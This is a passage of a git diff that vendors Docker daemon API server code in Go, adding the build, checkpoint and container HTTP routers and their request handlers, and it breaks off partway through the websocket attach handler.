+
+	if i := container.Isolation(r.FormValue("isolation")); i != "" {
+		if !container.Isolation.IsValid(i) {
+			return nil, fmt.Errorf("Unsupported isolation: %q", i)
+		}
+		options.Isolation = i
+	}
+
+	if runtime.GOOS != "windows" && options.SecurityOpt != nil {
+		return nil, fmt.Errorf("the daemon on this platform does not support --security-opt to build")
+	}
+
+	var buildUlimits = []*units.Ulimit{}
+	ulimitsJSON := r.FormValue("ulimits")
+	if ulimitsJSON != "" {
+		if err := json.Unmarshal([]byte(ulimitsJSON), &buildUlimits); err != nil {
+			return nil, err
+		}
+		options.Ulimits = buildUlimits
+	}
+
+	var buildArgs = map[string]*string{}
+	buildArgsJSON := r.FormValue("buildargs")
+
+	// Note that there are two ways a --build-arg might appear in the
+	// json of the query param:
+	//     "foo":"bar"
+	// and "foo":nil
+	// The first is the normal case, ie. --build-arg foo=bar
+	// or  --build-arg foo
+	// where foo's value was picked up from an env var.
+	// The second ("foo":nil) is where they put --build-arg foo
+	// but "foo" isn't set as an env var. In that case we can't just drop
+	// the fact they mentioned it, we need to pass that along to the builder
+	// so that it can print a warning about "foo" being unused if there is
+	// no "ARG foo" in the Dockerfile.
+	if buildArgsJSON != "" {
+		if err := json.Unmarshal([]byte(buildArgsJSON), &buildArgs); err != nil {
+			return nil, err
+		}
+		options.BuildArgs = buildArgs
+	}
+
+	var labels = map[string]string{}
+	labelsJSON := r.FormValue("labels")
+	if labelsJSON != "" {
+		if err := json.Unmarshal([]byte(labelsJSON), &labels); err != nil {
+			return nil, err
+		}
+		options.Labels = labels
+	}
+
+	var cacheFrom = []string{}
+	cacheFromJSON := r.FormValue("cachefrom")
+	if cacheFromJSON != "" {
+		if err := json.Unmarshal([]byte(cacheFromJSON), &cacheFrom); err != nil {
+			return nil, err
+		}
+		options.CacheFrom = cacheFrom
+	}
+
+	return options, nil
+}
+
+type syncWriter struct {
+	w  io.Writer
+	mu sync.Mutex
+}
+
+func (s *syncWriter) Write(b []byte) (count int, err error) {
+	s.mu.Lock()
+	count, err = s.w.Write(b)
+	s.mu.Unlock()
+	return
+}
+
+func (br *buildRouter) postBuild(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var (
+		authConfigs        = map[string]types.AuthConfig{}
+		authConfigsEncoded = r.Header.Get("X-Registry-Config")
+		notVerboseBuffer   = bytes.NewBuffer(nil)
+	)
+
+	if authConfigsEncoded != "" {
+		authConfigsJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authConfigsEncoded))
+		if err := json.NewDecoder(authConfigsJSON).Decode(&authConfigs); err != nil {
+			// for a pull it is not an error if no auth was given
+			// to increase compatibility with the existing api it is defaulting
+			// to be empty.
+		}
+	}
+
+	w.Header().Set("Content-Type", "application/json")
+
+	output := ioutils.NewWriteFlusher(w)
+	defer output.Close()
+	sf := streamformatter.NewJSONStreamFormatter()
+	errf := func(err error) error {
+		if httputils.BoolValue(r, "q") && notVerboseBuffer.Len() > 0 {
+			output.Write(notVerboseBuffer.Bytes())
+		}
+		// Do not write the error in the http output if it's still empty.
+		// This prevents from writing a 200(OK) when there is an internal error.
+		if !output.Flushed() {
+			return err
+		}
+		_, err = w.Write(sf.FormatError(err))
+		if err != nil {
+			logrus.Warnf("could not write error response: %v", err)
+		}
+		return nil
+	}
+
+	buildOptions, err := newImageBuildOptions(ctx, r)
+	if err != nil {
+		return errf(err)
+	}
+	buildOptions.AuthConfigs = authConfigs
+
+	remoteURL := r.FormValue("remote")
+
+	// Currently, only used if context is from a remote url.
+	// Look at code in DetectContextFromRemoteURL for more information.
+	createProgressReader := func(in io.ReadCloser) io.ReadCloser {
+		progressOutput := sf.NewProgressOutput(output, true)
+		if buildOptions.SuppressOutput {
+			progressOutput = sf.NewProgressOutput(notVerboseBuffer, true)
+		}
+		return progress.NewProgressReader(in, progressOutput, r.ContentLength, "Downloading context", remoteURL)
+	}
+
+	out := io.Writer(output)
+	if buildOptions.SuppressOutput {
+		out = notVerboseBuffer
+	}
+	out = &syncWriter{w: out}
+	stdout := &streamformatter.StdoutFormatter{Writer: out, StreamFormatter: sf}
+	stderr := &streamformatter.StderrFormatter{Writer: out, StreamFormatter: sf}
+
+	pg := backend.ProgressWriter{
+		Output:             out,
+		StdoutFormatter:    stdout,
+		StderrFormatter:    stderr,
+		ProgressReaderFunc: createProgressReader,
+	}
+
+	imgID, err := br.backend.BuildFromContext(ctx, r.Body, remoteURL, buildOptions, pg)
+	if err != nil {
+		return errf(err)
+	}
+
+	// Everything worked so if -q was provided the output from the daemon
+	// should be just the image ID and we'll print that to stdout.
+	if buildOptions.SuppressOutput {
+		stdout := &streamformatter.StdoutFormatter{Writer: output, StreamFormatter: sf}
+		fmt.Fprintf(stdout, "%s\n", string(imgID))
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
new file mode 100644
index 0000000000..8810f88b72
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
@@ -0,0 +1,10 @@
+package checkpoint
+
+import "github.com/docker/docker/api/types"
+
+// Backend for Checkpoint
+type Backend interface {
+	CheckpointCreate(container string, config types.CheckpointCreateOptions) error
+	CheckpointDelete(container string, config types.CheckpointDeleteOptions) error
+	CheckpointList(container string, config types.CheckpointListOptions) ([]types.Checkpoint, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
new file mode 100644
index 0000000000..c1e93926f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
@@ -0,0 +1,36 @@
+package checkpoint
+
+import (
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/router"
+)
+
+// checkpointRouter is a router to talk with the checkpoint controller
+type checkpointRouter struct {
+	backend Backend
+	decoder httputils.ContainerDecoder
+	routes  []router.Route
+}
+
+// NewRouter initializes a new checkpoint router
+func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router {
+	r := &checkpointRouter{
+		backend: b,
+		decoder: decoder,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routers to the checkpoint controller
+func (r *checkpointRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *checkpointRouter) initRoutes() {
+	r.routes = []router.Route{
+		router.Experimental(router.NewGetRoute("/containers/{name:.*}/checkpoints", r.getContainerCheckpoints)),
+		router.Experimental(router.NewPostRoute("/containers/{name:.*}/checkpoints", r.postContainerCheckpoint)),
+		router.Experimental(router.NewDeleteRoute("/containers/{name}/checkpoints/{checkpoint}", r.deleteContainerCheckpoint)),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
new file mode 100644
index 0000000000..f988431191
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
@@ -0,0 +1,65 @@
+package checkpoint
+
+import (
+	"encoding/json"
+	"net/http"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func (s *checkpointRouter) postContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	var options types.CheckpointCreateOptions
+
+	decoder := json.NewDecoder(r.Body)
+	if err := decoder.Decode(&options); err != nil {
+		return err
+	}
+
+	err := s.backend.CheckpointCreate(vars["name"], options)
+	if err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusCreated)
+	return nil
+}
+
+func (s *checkpointRouter) getContainerCheckpoints(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	checkpoints, err := s.backend.CheckpointList(vars["name"], types.CheckpointListOptions{
+		CheckpointDir: r.Form.Get("dir"),
+	})
+
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, checkpoints)
+}
+
+func (s *checkpointRouter) deleteContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	err := s.backend.CheckpointDelete(vars["name"], types.CheckpointDeleteOptions{
+		CheckpointDir: r.Form.Get("dir"),
+		CheckpointID:  vars["checkpoint"],
+	})
+
+	if err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/backend.go b/vendor/github.com/docker/docker/api/server/router/container/backend.go
new file mode 100644
index 0000000000..0d20188ccf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/backend.go
@@ -0,0 +1,79 @@
+package container
+
+import (
+	"io"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/pkg/archive"
+)
+
+// execBackend includes functions to implement to provide exec functionality.
+type execBackend interface {
+	ContainerExecCreate(name string, config *types.ExecConfig) (string, error)
+	ContainerExecInspect(id string) (*backend.ExecInspect, error)
+	ContainerExecResize(name string, height, width int) error
+	ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) error
+	ExecExists(name string) (bool, error)
+}
+
+// copyBackend includes functions to implement to provide container copy functionality.
+type copyBackend interface {
+	ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error)
+	ContainerCopy(name string, res string) (io.ReadCloser, error)
+	ContainerExport(name string, out io.Writer) error
+	ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error
+	ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error)
+}
+
+// stateBackend includes functions to implement to provide container state lifecycle functionality.
+type stateBackend interface {
+	ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
+	ContainerKill(name string, sig uint64) error
+	ContainerPause(name string) error
+	ContainerRename(oldName, newName string) error
+	ContainerResize(name string, height, width int) error
+	ContainerRestart(name string, seconds *int) error
+	ContainerRm(name string, config *types.ContainerRmConfig) error
+	ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error
+	ContainerStop(name string, seconds *int) error
+	ContainerUnpause(name string) error
+	ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error)
+	ContainerWait(name string, timeout time.Duration) (int, error)
+}
+
+// monitorBackend includes functions to implement to provide containers monitoring functionality.
+type monitorBackend interface {
+	ContainerChanges(name string) ([]archive.Change, error)
+	ContainerInspect(name string, size bool, version string) (interface{}, error)
+	ContainerLogs(ctx context.Context, name string, config *backend.ContainerLogsConfig, started chan struct{}) error
+	ContainerStats(ctx context.Context, name string, config *backend.ContainerStatsConfig) error
+	ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error)
+
+	Containers(config *types.ContainerListOptions) ([]*types.Container, error)
+}
+
+// attachBackend includes function to implement to provide container attaching functionality.
+type attachBackend interface {
+	ContainerAttach(name string, c *backend.ContainerAttachConfig) error
+}
+
+// systemBackend includes functions to implement to provide system wide containers functionality
+type systemBackend interface {
+	ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error)
+}
+
+// Backend is all the methods that need to be implemented to provide container specific functionality.
+type Backend interface {
+	execBackend
+	copyBackend
+	stateBackend
+	monitorBackend
+	attachBackend
+	systemBackend
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/container.go b/vendor/github.com/docker/docker/api/server/router/container/container.go
new file mode 100644
index 0000000000..bbed7e9944
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/container.go
@@ -0,0 +1,77 @@
+package container
+
+import (
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/router"
+)
+
+type validationError struct {
+	error
+}
+
+func (validationError) IsValidationError() bool {
+	return true
+}
+
+// containerRouter is a router to talk with the container controller
+type containerRouter struct {
+	backend Backend
+	decoder httputils.ContainerDecoder
+	routes  []router.Route
+}
+
+// NewRouter initializes a new container router
+func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router {
+	r := &containerRouter{
+		backend: b,
+		decoder: decoder,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routes to the container controller
+func (r *containerRouter) Routes() []router.Route {
+	return r.routes
+}
+
+// initRoutes initializes the routes in container router
+func (r *containerRouter) initRoutes() {
+	r.routes = []router.Route{
+		// HEAD
+		router.NewHeadRoute("/containers/{name:.*}/archive", r.headContainersArchive),
+		// GET
+		router.NewGetRoute("/containers/json", r.getContainersJSON),
+		router.NewGetRoute("/containers/{name:.*}/export", r.getContainersExport),
+		router.NewGetRoute("/containers/{name:.*}/changes", r.getContainersChanges),
+		router.NewGetRoute("/containers/{name:.*}/json", r.getContainersByName),
+		router.NewGetRoute("/containers/{name:.*}/top", r.getContainersTop),
+		router.Cancellable(router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs)),
+		router.Cancellable(router.NewGetRoute("/containers/{name:.*}/stats", r.getContainersStats)),
+		router.NewGetRoute("/containers/{name:.*}/attach/ws", r.wsContainersAttach),
+		router.NewGetRoute("/exec/{id:.*}/json", r.getExecByID),
+		router.NewGetRoute("/containers/{name:.*}/archive", r.getContainersArchive),
+		// POST
+		router.NewPostRoute("/containers/create", r.postContainersCreate),
+		router.NewPostRoute("/containers/{name:.*}/kill", r.postContainersKill),
+		router.NewPostRoute("/containers/{name:.*}/pause", r.postContainersPause),
+		router.NewPostRoute("/containers/{name:.*}/unpause", r.postContainersUnpause),
+		router.NewPostRoute("/containers/{name:.*}/restart", r.postContainersRestart),
+		router.NewPostRoute("/containers/{name:.*}/start", r.postContainersStart),
+		router.NewPostRoute("/containers/{name:.*}/stop", r.postContainersStop),
+		router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait),
+		router.NewPostRoute("/containers/{name:.*}/resize", r.postContainersResize),
+		router.NewPostRoute("/containers/{name:.*}/attach", r.postContainersAttach),
+		router.NewPostRoute("/containers/{name:.*}/copy", r.postContainersCopy), // Deprecated since 1.8, Errors out since 1.12
+		router.NewPostRoute("/containers/{name:.*}/exec", r.postContainerExecCreate),
+		router.NewPostRoute("/exec/{name:.*}/start", r.postContainerExecStart),
+		router.NewPostRoute("/exec/{name:.*}/resize", r.postContainerExecResize),
+		router.NewPostRoute("/containers/{name:.*}/rename", r.postContainerRename),
+		router.NewPostRoute("/containers/{name:.*}/update", r.postContainerUpdate),
+		router.NewPostRoute("/containers/prune", r.postContainersPrune),
+		// PUT
+		router.NewPutRoute("/containers/{name:.*}/archive", r.putContainersArchive),
+		// DELETE
+		router.NewDeleteRoute("/containers/{name:.*}", r.deleteContainers),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/container_routes.go b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go
new file mode 100644
index 0000000000..9c9bc0f8c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go
@@ -0,0 +1,554 @@
+package container
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"strconv"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/signal"
+	"golang.org/x/net/context"
+	"golang.org/x/net/websocket"
+)
+
+func (s *containerRouter) getContainersJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filter, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	config := &types.ContainerListOptions{
+		All:     httputils.BoolValue(r, "all"),
+		Size:    httputils.BoolValue(r, "size"),
+		Since:   r.Form.Get("since"),
+		Before:  r.Form.Get("before"),
+		Filters: filter,
+	}
+
+	if tmpLimit := r.Form.Get("limit"); tmpLimit != "" {
+		limit, err := strconv.Atoi(tmpLimit)
+		if err != nil {
+			return err
+		}
+		config.Limit = limit
+	}
+
+	containers, err := s.backend.Containers(config)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, containers)
+}
+
+func (s *containerRouter) getContainersStats(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	stream := httputils.BoolValueOrDefault(r, "stream", true)
+	if !stream {
+		w.Header().Set("Content-Type", "application/json")
+	}
+
+	config := &backend.ContainerStatsConfig{
+		Stream:    stream,
+		OutStream: w,
+		Version:   string(httputils.VersionFromContext(ctx)),
+	}
+
+	return s.backend.ContainerStats(ctx, vars["name"], config)
+}
+
+func (s *containerRouter) getContainersLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	// Args are validated before the stream starts because when it starts we're
+	// sending HTTP 200 by writing an empty chunk of data to tell the client that
+	// daemon is going to stream. By sending this initial HTTP 200 we can't report
+	// any error after the stream starts (i.e. container not found, wrong parameters)
+	// with the appropriate status code.
+	stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr")
+	if !(stdout || stderr) {
+		return fmt.Errorf("Bad parameters: you must choose at least one stream")
+	}
+
+	containerName := vars["name"]
+	logsConfig := &backend.ContainerLogsConfig{
+		ContainerLogsOptions: types.ContainerLogsOptions{
+			Follow:     httputils.BoolValue(r, "follow"),
+			Timestamps: httputils.BoolValue(r, "timestamps"),
+			Since:      r.Form.Get("since"),
+			Tail:       r.Form.Get("tail"),
+			ShowStdout: stdout,
+			ShowStderr: stderr,
+			Details:    httputils.BoolValue(r, "details"),
+		},
+		OutStream: w,
+	}
+
+	chStarted := make(chan struct{})
+	if err := s.backend.ContainerLogs(ctx, containerName, logsConfig, chStarted); err != nil {
+		select {
+		case <-chStarted:
+			// The client may be expecting all of the data we're sending to
+			// be multiplexed, so send it through OutStream, which will
+			// have been set up to handle that if needed.
+			fmt.Fprintf(logsConfig.OutStream, "Error running logs job: %v\n", err)
+		default:
+			return err
+		}
+	}
+
+	return nil
+}
+
+func (s *containerRouter) getContainersExport(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return s.backend.ContainerExport(vars["name"], w)
+}
+
+func (s *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	// If contentLength is -1, we can assumed chunked encoding
+	// or more technically that the length is unknown
+	// https://golang.org/src/pkg/net/http/request.go#L139
+	// net/http otherwise seems to swallow any headers related to chunked encoding
+	// including r.TransferEncoding
+	// allow a nil body for backwards compatibility
+
+	version := httputils.VersionFromContext(ctx)
+	var hostConfig *container.HostConfig
+	// A non-nil json object is at least 7 characters.
+	if r.ContentLength > 7 || r.ContentLength == -1 {
+		if versions.GreaterThanOrEqualTo(version, "1.24") {
+			return validationError{fmt.Errorf("starting container with non-empty request body was deprecated since v1.10 and removed in v1.12")}
+		}
+
+		if err := httputils.CheckForJSON(r); err != nil {
+			return err
+		}
+
+		c, err := s.decoder.DecodeHostConfig(r.Body)
+		if err != nil {
+			return err
+		}
+		hostConfig = c
+	}
+
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	checkpoint := r.Form.Get("checkpoint")
+	checkpointDir := r.Form.Get("checkpoint-dir")
+	if err := s.backend.ContainerStart(vars["name"], hostConfig, checkpoint, checkpointDir); err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (s *containerRouter) postContainersStop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	var seconds *int
+	if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" {
+		valSeconds, err := strconv.Atoi(tmpSeconds)
+		if err != nil {
+			return err
+		}
+		seconds = &valSeconds
+	}
+
+	if err := s.backend.ContainerStop(vars["name"], seconds); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+type errContainerIsRunning interface {
+	ContainerIsRunning() bool
+}
+
+func (s *containerRouter) postContainersKill(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	var sig syscall.Signal
+	name := vars["name"]
+
+	// If we have a signal, look at it. Otherwise, do nothing
+	if sigStr := r.Form.Get("signal"); sigStr != "" {
+		var err error
+		if sig, err = signal.ParseSignal(sigStr); err != nil {
+			return err
+		}
+	}
+
+	if err := s.backend.ContainerKill(name, uint64(sig)); err != nil {
+		var isStopped bool
+		if e, ok := err.(errContainerIsRunning); ok {
+			isStopped = !e.ContainerIsRunning()
+		}
+
+		// Return error that's not caused because the container is stopped.
+		// Return error if the container is not running and the api is >= 1.20
+		// to keep backwards compatibility.
+		version := httputils.VersionFromContext(ctx)
+		if versions.GreaterThanOrEqualTo(version, "1.20") || !isStopped {
+			return fmt.Errorf("Cannot kill container %s: %v", name, err)
+		}
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (s *containerRouter) postContainersRestart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	var seconds *int
+	if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" {
+		valSeconds, err := strconv.Atoi(tmpSeconds)
+		if err != nil {
+			return err
+		}
+		seconds = &valSeconds
+	}
+
+	if err := s.backend.ContainerRestart(vars["name"], seconds); err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+func (s *containerRouter) postContainersPause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := s.backend.ContainerPause(vars["name"]); err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+func (s *containerRouter) postContainersUnpause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := s.backend.ContainerUnpause(vars["name"]); err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+func (s *containerRouter) postContainersWait(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	status, err := s.backend.ContainerWait(vars["name"], -1*time.Second)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, &container.ContainerWaitOKBody{
+		StatusCode: int64(status),
+	})
+}
+
+func (s *containerRouter) getContainersChanges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	changes, err := s.backend.ContainerChanges(vars["name"])
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, changes)
+}
+
+func (s *containerRouter) getContainersTop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	procList, err := s.backend.ContainerTop(vars["name"], r.Form.Get("ps_args"))
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, procList)
+}
+
+func (s *containerRouter) postContainerRename(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+	newName := r.Form.Get("name")
+	if err := s.backend.ContainerRename(name, newName); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (s *containerRouter) postContainerUpdate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	var updateConfig container.UpdateConfig
+
+	decoder := json.NewDecoder(r.Body)
+	if err := decoder.Decode(&updateConfig); err != nil {
+		return err
+	}
+
+	hostConfig := &container.HostConfig{
+		Resources:     updateConfig.Resources,
+		RestartPolicy: updateConfig.RestartPolicy,
+	}
+
+	name := vars["name"]
+	resp, err := s.backend.ContainerUpdate(name, hostConfig)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, resp)
+}
+
+func (s *containerRouter) postContainersCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	name := r.Form.Get("name")
+
+	config, hostConfig, networkingConfig, err := s.decoder.DecodeConfig(r.Body)
+	if err != nil {
+		return err
+	}
+	version := httputils.VersionFromContext(ctx)
+	adjustCPUShares := versions.LessThan(version, "1.19")
+
+	ccr, err := s.backend.ContainerCreate(types.ContainerCreateConfig{
+		Name:             name,
+		Config:           config,
+		HostConfig:       hostConfig,
+		NetworkingConfig: networkingConfig,
+		AdjustCPUShares:  adjustCPUShares,
+	})
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, ccr)
+}
+
+func (s *containerRouter) deleteContainers(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+	config := &types.ContainerRmConfig{
+		ForceRemove:  httputils.BoolValue(r, "force"),
+		RemoveVolume: httputils.BoolValue(r, "v"),
+		RemoveLink:   httputils.BoolValue(r, "link"),
+	}
+
+	if err := s.backend.ContainerRm(name, config); err != nil {
+		return err
+	}
+
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+func (s *containerRouter) postContainersResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	height, err := strconv.Atoi(r.Form.Get("h"))
+	if err != nil {
+		return err
+	}
+	width, err := strconv.Atoi(r.Form.Get("w"))
+	if err != nil {
+		return err
+	}
+
+	return s.backend.ContainerResize(vars["name"], height, width)
+}
+
+func (s *containerRouter) postContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	err := httputils.ParseForm(r)
+	if err != nil {
+		return err
+	}
+	containerName := vars["name"]
+
+	_, upgrade := r.Header["Upgrade"]
+	detachKeys := r.FormValue("detachKeys")
+
+	hijacker, ok := w.(http.Hijacker)
+	if !ok {
+		return fmt.Errorf("error attaching to container %s, hijack connection missing", containerName)
+	}
+
+	setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) {
+		conn, _, err := hijacker.Hijack()
+		if err != nil {
+			return nil, nil, nil, err
+		}
+
+		// set raw mode
+		conn.Write([]byte{})
+
+		if upgrade {
+			fmt.Fprintf(conn, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\r\n")
+		} else {
+			fmt.Fprintf(conn, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n")
+		}
+
+		closer := func() error {
+			httputils.CloseStreams(conn)
+			return nil
+		}
+		return ioutils.NewReadCloserWrapper(conn, closer), conn, conn, nil
+	}
+
+	attachConfig := &backend.ContainerAttachConfig{
+		GetStreams: setupStreams,
+		UseStdin:   httputils.BoolValue(r, "stdin"),
+		UseStdout:  httputils.BoolValue(r, "stdout"),
+		UseStderr:  httputils.BoolValue(r, "stderr"),
+		Logs:       httputils.BoolValue(r, "logs"),
+		Stream:     httputils.BoolValue(r, "stream"),
+		DetachKeys: detachKeys,
+		MuxStreams: true,
+	}
+
+	if err = s.backend.ContainerAttach(containerName, attachConfig); err != nil {
+		logrus.Errorf("Handler for %s %s returned error: %v", r.Method, r.URL.Path, err)
+		// Remember to close stream if error happens
+		conn, _, errHijack := hijacker.Hijack()
+		if errHijack == nil {
+			statusCode := httputils.GetHTTPErrorStatusCode(err)
+			statusText := http.StatusText(statusCode)
+			fmt.Fprintf(conn, "HTTP/1.1 %d %s\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n%s\r\n", statusCode, statusText, err.Error())
+			httputils.CloseStreams(conn)
+		} else {
+			logrus.Errorf("Error Hijacking: %v", err)
+		}
+	}
+	return nil
+}
+
+func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	containerName := vars["name"]
+
+	var err error
+	detachKeys := r.FormValue("detachKeys")
+
+	done := make(chan struct{})
+	started := make(chan struct{})
+
+	setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) {
+		wsChan := make(chan *websocket.Conn)
+		h := func(conn *websocket.Conn) {
+			wsChan <- conn
+			<-done
+		}
+
+		srv := websocket.Server{Handler: h, Handshake: nil}
+		go func() {
+			close(started)
+			srv.ServeHTTP(w, r)
+		}()
+
+		conn := <-wsChan
